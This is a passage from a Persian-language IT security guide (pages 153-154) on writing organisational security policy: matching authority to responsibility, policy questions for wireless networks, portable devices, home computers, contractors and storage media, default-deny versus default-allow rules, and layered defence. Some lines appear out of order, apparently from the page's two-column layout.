ﺗﺮﻗﻲ ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻃﻮﻝ ﻣﺪﺕ ﻛﺎﺭ ﺩﺍﺩﻩ ﺷﻮﺩ ﻭ ﺍﺟـﺎﺯﻩ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ ﺑﺠﺎﻱ ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﻋﺼﺮ ﻫﺮ ﺭﻭﺯ ﻭ
ﺗﻌﻄﻴﻼﺕ ﺁﺧﺮ ﻫﻔﺘـﻪ ﺭﺍ ﺑـﺎ ﺧـﺎﻧﻮﺍﺩﻩﻫﺎﻳـﺸﺎﻥ ﺳـﭙﺮﻱ ﻛﻨﻨـﺪ ،ﺍﺯ
ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﺧﺮﺳﻨﺪﺗﺮ ﻭ ﺭﺍﺿﻲﺗﺮ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺗﻮﺯﻳﻊ ﻛﻨﻴـﺪ .ﻳـﻚ ﺍﺻـﻞ ﺩﺭ
ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﻣﻲﮔﻮﻳﺪ:
ﺍﮔﺮ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻣﻨﻴﺖ ﺩﺍﺭﻳـﺪ ﻭﻟـﻲ ﺍﺧﺘﻴـﺎﺭﻱ ﺑـﺮﺍﻱ
ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻭ ﺗﻨﺒﻴﻪ ﻣﺘﺨﻠﻔﻴﻦ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﻧﺸﺪﻩ ﺍﺳﺖ ،ﻫﻨﮕـﺎﻡ
ﻭﻗﻮﻉ ﻳـﻚ ﻣـﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﻳـﻦ ﺷـﻤﺎ ﻫـﺴﺘﻴﺪ ﻛـﻪ ﺳـﺮﺯﻧﺶ
ﻣﻲﺷﻮﻳﺪ.
ﻫﺮ ﭼﻨﺪ ﺍﺻﻞ ﺑﺎﻻ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺑﺮﻗﺮﺍﺭ ﺍﺳﺖ ،ﺍﻣـﺎ ﻣـﺴﺌﻮﻟﻴﺖ
ﻭﺍﻗﻌﻲ ﻣﺘﻮﺟﻪ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ
ﺗﻮﺯﻳﻊ ﻧﻜﺮﺩﻩ ﺍﺳﺖ.
ﺍﻳﻦ ﺑﺨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻛﻨﺎﻧﻲ ﺍﺳـﺖ
ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﻋﻮﺍﻣﻞ ﻣﻬﻢ
ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺷﺎﻣﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ ،ﺁﮔـﺎﻫﻲ ،ﺁﻣـﻮﺯﺵ ﻭ
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﻃﺮﺡ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ.
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻴﺪ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺎﺳﺖ ﺧﻮﺩ ﺭﺍ ﺗﺪﻭﻳﻦ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ،ﺑﺎﻳـﺪ ﺍﻃﻤﻴﻨـﺎﻥ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺳﻴﺴﺘﻤﻬﺎ ،ﺷﺒﻜﻪ ﻫﺎ ،ﻛﺎﺭﻛﻨـﺎﻥ ﻭ
ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺤـﻴﻂ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ
ﻣﻲﺷﻨﺎﺳﻴﺪ ﻭ ﻫﻤﺔ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻳﺪ .ﺍﻳﻦ ﺷﻨﺎﺧﺖ ،ﺁﻧﭽـﻪ
ﺑﺎﻋﺚ ﻧﮕﺮﺍﻧﻲ ﺷﻤﺎﺳﺖ ﺭﺍ ﺗﻌﺮﻳﻒ ﻣـﻲﻛﻨـﺪ .ﻭﻗﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ
ﺗﺪﻭﻳﻦ ﻣﻲﻛﻨﻴﺪ ،ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﺁﻧﭽـﻪ ﻛـﻪ
ﺩﺭ ﻣﺤﻴﻂ ﺷﻤﺎﺳﺖ ﻭ ﻳﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺤﻴﻂ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺑـﺎ
ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺷﻤﺎ ﺗﻌﺎﻣﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺭﺍ ﺍﺯ ﻗﻠﻢ ﻧﻴﺎﻧﺪﺍﺧﺘﻪﺍﻳـﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﮔﺬﺷﺘﻪ ﻣﺤﻴﻂ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻫﻤﺎﻥ ﻣﺮﺯﻫﺎﻱ ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﻫـﺎ
ﻭ ﻧﺮﺩﻩﻫﺎ ﺗﻌﺮﻳﻒ ﻣﻲﻛﺮﺩﻧﺪ؛ ﺍﻣـﺎ ﺍﻣـﺮﻭﺯﻩ ﻣﺤﻴﻄﻬـﺎﻱ ﺳـﺎﺯﻣﺎﻧﻲ
١٥٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﺤﻮﻃﻪ ﺑﺒﺮﺩ ،ﺑﺎ ﭼﻪ ﺭﻭﺷـﻬﺎﻳﻲ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ
ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ )ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﺷﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﻣـﻲﺷـﻮﺩ( ﻭ
ﺍﮔﺮ ﺁﻥ ﺭﺳﺎﻧﻪ ﺩﺯﺩﻳﺪﻩ ﻳﺎ ﮔـﻢ ﺷـﻮﺩ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ
ﺍﻧﺠﺎﻡ ﺩﺍﺩ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺸﺮﻭﺡ ﺑﻴﺎﻥ ﺷـﻮﺩ
ﻼ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳـﺪ
ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﻗﺒ ﹰ
ﺍﺯ ﺑـﻴﻦ ﺑـﺮﻭﺩ ﺗـﺎ ﺍﺣﺘﻤـﺎﻝ ﺧﻄﺮﻫـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺍﻓــﺸﺎﻱ
ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻥ ﻛﺎﻫﺶ ﻳﺎﺑﺪ.
ﺑﻨﺪﺭﺕ ﺍﻳﻨﻘﺪﺭ ﺍﻳﺴﺘﺎ ﻫﺴﺘﻨﺪ.
ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺧﻮﺩ ﺑﺎﻳﺪ ﻧﻜﺎﺗﻲ ﻣﺜـﻞ ﻣـﻮﺍﺭﺩ ﺯﻳـﺮ ﺭﺍ
ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
•
•
ﻭ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺮﺍﻱ ﭘﺮﺳﺸﻬﺎﻱ ﺯﻳﺮ ﭘﺎﺳـﺨﻬﺎﻱ ﻣﻨﺎﺳـﺒﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ:
•
ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻛﻪ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻣﻲﮔﻴﺮﻧﺪ ﻳﺎ ﺑـﻪ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺎﻳﺖ ﻣﺘـﺼﻞ ﻣـﻲﺷـﻮﻧﺪ،
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﻳﺎ ﭘﺎﺭﻙ ﻛـﺮﺩﻥ
ﻳﻚ ﻣﺎﺷﻴﻦ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ
ﻛﻴﻔﻲ ﺩﺭ ﺩﺍﺧﻞ ﻣﺎﺷﻴﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﻗـﺮﺍﺭ
ﺑﮕﻴﺮﻧﺪ .ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﺑﺎﻳـﺪ ﻃـﻮﺭﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻭ
ﺣﻔﺎﻇﺖ ﺷﻮﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣـﺴﺎﺱ ﺁﻧﻬـﺎ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ
ﺳﺎﻳﺖ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﻨﺪ ﻭ ﺍﺯ ﻭﺭﻭﺩ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ
ﻣﺨﺮﺏ ﻣﻬﺎﺟﻤﻴﻦ ﺑﻪ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﮔﺮﺩﺩ.
ﻛﺪﺍﻡ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻛﺴﺎﻧﻲ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ﻛـﻪ PDAﻫـﺎ ﻭ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻣﻼﻗﺎﺗﻬـﺎ ﻭ ﻳـﺎ ﺻـﺮﻓﹰﺎ ﺩﺭ
ﺑﺎﺯﺩﻳﺪﻫﺎ ﺑﻪ ﻣﺤﻞ ﻛﺎﺭ ﻣﻲﺁﻭﺭﻧﺪ؟ ﺿﻮﺍﺑﻂ ﺍﺗﺼﺎﻝ ﺁﻧﻬﺎ ﺑـﻪ
ﺷﺒﻜﻪﻫﺎ ،ﺧﻄﻮﻁ ﺗﻠﻔﻦ ،ﭼﺎﭘﮕﺮﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺤﻞ
ﻛﺎﺭ ﭼﻴﺴﺘﻨﺪ؟
•
ﭼﻪ ﻣﻼﺣﻈﺎﺗﻲ ﺑﺮﺍﻱ ﺣﻤﻞ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻳﺎ ﺗﺠﻬﻴﺰﺍﺕ ﺫﺧﻴـﺮﺓ
ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻞ ﻛﺎﺭ )ﻣﺜ ﹰﻼ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ( ﺍﺗﺨﺎﺫ
ﺷﺪﻩ ﺍﺳﺖ؟ ﺍﮔﺮ ﺭﻭﻱ ﺩﻳﺴﻜﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻭﺟـﻮﺩ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﭼﻪ ﺧﻮﺍﻫﺪ ﺷﺪ؟ ﺩﺭ ﻣﻮﺭﺩ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺟﺎﺭﻩﺍﻱ
ﻛﻪ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺻﺎﺣﺒﺎﻧﺸﺎﻥ ﻋـﻮﺩﺕ ﺩﺍﺩﻩ ﻣـﻲﺷـﻮﻧﺪ ﭼـﻪ
ﺭﺍﻫﺒﺮﺩﻱ ﺍﺗﺨﺎﺫ ﺷﺪﻩ ﺍﺳﺖ؟
•
ﺭﺍﻳﺎﻧﻪ ﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻨﺎﺯﻝ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ ﻣﻌـﺮﺽ ﺧﻄـﺮ
ﻧﻔﻮﺫ ،ﺩﺯﺩﻱ ،ﻭ ﻭﺭﻭﺩ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨـﺮﺏ ﺑﺎﺷـﻨﺪ ﻭ
ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺮﺧﻼﻑ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺳـﺎﺯﻣﺎﻥ
ﻼ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳـﻚ ﺗﺠـﺎﺭﺕ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ )ﻣﺜ ﹰ
ﺍﮔﺮ ﺷﺮﻛﺎﻱ ﺗﺠـﺎﺭﻱ ﻳـﺎ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ ﺑـﻪ ﻭﺳـﺎﻳﻞ ﺷـﻤﺎ
ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ -ﺧﻮﺍﻩ ﺩﺭ ﻣﺤـﻞ ﻛـﺎﺭ ﺷـﻤﺎ ﻳـﺎ
ﻣﺤﻞ ﻛﺎﺭ ﺧﻮﺩﺷﺎﻥ -ﭼﻪ ﻛـﺴﻲ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺣﻔﺎﻇـﺖ
ﺧﻮﺍﻫﺪ ﻛـﺮﺩ؟ ﭼﮕﻮﻧـﻪ ﺍﺯ ﺍﺧـﺘﻼﻁ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﺩﺍﺩﻩﻫـﺎﻱ
ﺣﺴﺎﺱ ﺧﻮﺩ ﺑﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﻴﺪ؟
•
ﭼﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺗﺤﺖ ﮔـﻮﺍﻫﻲ "ﺍﺳـﺮﺍﺭ
ﺗﺠﺎﺭﻱ" ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟
ﭼﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻝ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺍﺳـﺖ ﻭ ﻛﺠـﺎ
ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟
•
ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﺑـﺮ ﺗﺠﻬﻴـﺰﺍﺕ ﻏﻴﺮﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﭘـﺮﺩﺍﺯﺵ
ﺍﻃﻼﻋﺎﺕ ﺣﺎﻛﻢ ﻫﺴﺘﻨﺪ؟ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭼـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ
ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﭼﺎﭘﮕﺮﻫــﺎ ،ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﻛﭙــﻲ ﻭ
ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻭﺭﻧﮕﺎﺭ ﺗﺪﻭﻳﻦ ﺷﺪﻩﺍﻧﺪ؟ )ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ
ﻣــﺴﺘﻘﻞ ﻭ ﻳــﺎ ﻣﻴﺰﺑــﺎﻧﻲ ﻳــﻚ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﻭﺏ ﺑــﺎ ﻣﺤﺘﻮﻳــﺎﺕ
ﺳﺆﺍﻝ ﺑﺮﺍﻧﮕﻴـﺰ( .ﺳﻴﺎﺳـﺖ ﺑﺎﻳـﺪ ﻣـﺸﺨﺺ ﻛﻨـﺪ ﻛـﻪ ﺍﻳـﻦ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ،ﺣﻔﺎﻇـﺖ ﻭ ﺑـﺎﺯﺑﻴﻨﻲ
ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
•
ﻻ ﻗﺎﺑﻞ ﺣﻤﻞ ﻭ ﻓـﺸﺮﺩﻩ ﺍﺳـﺖ.
ﺭﺳﺎﻧﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻣﻌﻤﻮ ﹰ
ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﻮﺍﺑﻖ ﻣﺎﻟﻲ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﻳﻚ ﺳﺎﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓـﺸﺮﺩﻩ ﻳـﺎ
DVDﺑﺮﻳﺰﺩ ،ﺩﺭﺻـﻮﺭﺕ ﺩﺯﺩﻳـﺪﻩ ﻳـﺎ ﺟﺎﺑﺠـﺎ ﺷـﺪﻥ ﺁﻥ
ﺭﺳﺎﻧﻪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ؟ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳـﺪ ﻣـﺸﺨﺺ
ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﻛﺴﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺭﺳﺎﻧﻪ ﺭﺍ ﺑـﻪ ﺑﻴـﺮﻭﻥ ﺍﺯ
ﺱ ﻛﺎﻏﺬﻱ ﻧﺴﺒﺖ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎ ﹺ
ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ(
ﺑﺨﺶ ﺳﻮﻡ
•
ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﺯ ﻣﻮﻗﻌﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺧــﻮﺩ ﺩﻭﺭ ﻫــﺴﺘﻴﺪ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ
ﺣﻤﻞ ﻭ PDAﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﻣﺜﻞ ﺁﺩﺭﺳﻬﺎﻱ ،IPﺷﻤﺎﺭﻩﻫﺎﻱ ﺗﻠﻔﻦ
ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻨﺪ .ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ
ﻼ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺍﻣﻨﻴﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﺷـﻨﺪ؛ ﻣـﺜ ﹰ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﻳﺎ ﺣﺪﺍﻗﻞ ﻧﺸﺎﻧﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ
ﻓﻴﺰﻳﻜﻲ .ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺧﻄـﺮﺍﺕ ﺩﺯﺩﻱ ﻭ
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺁﮔﺎﻩ ﻭ ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﺑﺎﺷﻨﺪ.
١٥٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻓﻜﺮ ﻛﺮﺩﻥ ﺑﻪ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﻫﺮ ﻣﺸﻜﻠﻲ ﻛﻤﻚ
ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﻣـﺸﻜﻞ ﺟﻠـﻮﮔﻴﺮﻱ ﻛـﺮﺩ .ﺗﻬﻴـﺔ
ﻋﺒﺎﺭﺗﻬﺎﻱ ﺑﺎﻣﻌﻨﻲ ﺩﺭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻫﻤﻪ ﻛﻤـﻚ ﻣـﻲﻛﻨـﺪ
ﻧﮕﺮﺍﻧﻴﻬﺎ ﺭﺍ ﺑﻔﻬﻤﻨﺪ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺻـﺤﻴﺢ ﭘﻴـﺸﮕﻴﺮﻱ ﺭﺍ ﺑﻜـﺎﺭ
ﺑﻨﺪﻧﺪ.
ﺑﺮﺍﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﭘﺎﻳﻪ ﺍﺗﺨﺎﺫ ﻛﻨﻴﺪ
ﺍﺑﺘﺪﺍ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻃﺒﻖ ﻛﺪﺍﻡ ﺍﻟﮕﻮﻱ ﺯﻳﺮ ﻋﻤـﻞ ﻛﻨﻴـﺪ:
"ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﻤﻨـﻮﻉ ﺍﻋـﻼﻡ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻣﺠـﺎﺯ ﺍﺳـﺖ" ﻳـﺎ
"ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﺠﺎﺯ ﺩﺍﻧﺴﺘﻪ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ﻣﻤﻨﻮﻉ ﺍﺳـﺖ" .ﺳـﭙﺲ
ﺑﺒﻴﻨﻴﺪ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺭﺍ ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺗﻌﺮﻳـﻒ ﻛﻨﻴـﺪ .ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻣﻮﺭﺩ ﺍﻭﻝ ﺑﺎ ﻳﻚ ﻣﺤﻴﻂ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎﺯ ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﺪ ،ﻣﺜﻞ ﻳﻚ
ﺩﺍﻧﺸﮕﺎﻩ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﻮﺭﺩ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﻳﻚ ﻣﺆﺳﺴﺔ ﺗﺠﺎﺭﻱ
ﻣﻨﺎﺳﺐ ﺍﺳﺖ ،ﻣﺎﻧﻨﺪ ﻳﻚ ﺑﺎﻧﻚ.
ﻭﻗﺘﻲ ﺑـﺮﺍﻱ ﺳﻴﺎﺳـﺖ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣﻘﺎﺑﻠـﺔ ﺧـﻮﺩ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ
ﻣﻲﻛﻨﻴﺪ ،ﺩﺭ ﻳﻚ ﻻﻳﻪ ﻣﺘﻮﻗﻒ ﻧـﺸﻮﻳﺪ ﻭ ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ
ﺗﻬﺪﻳﺪﺍﺕ ﻣﺨﺘﻠﻒ ،ﭼﻨﺪ ﺳﻄﺢ ﺣﻔﺎﻇﺘﻲ ﻫﻤﭙﻮﺷﺎﻥ ﻭ ﻣﺴﺘﻘﻞ ﺑﻨـﺎ
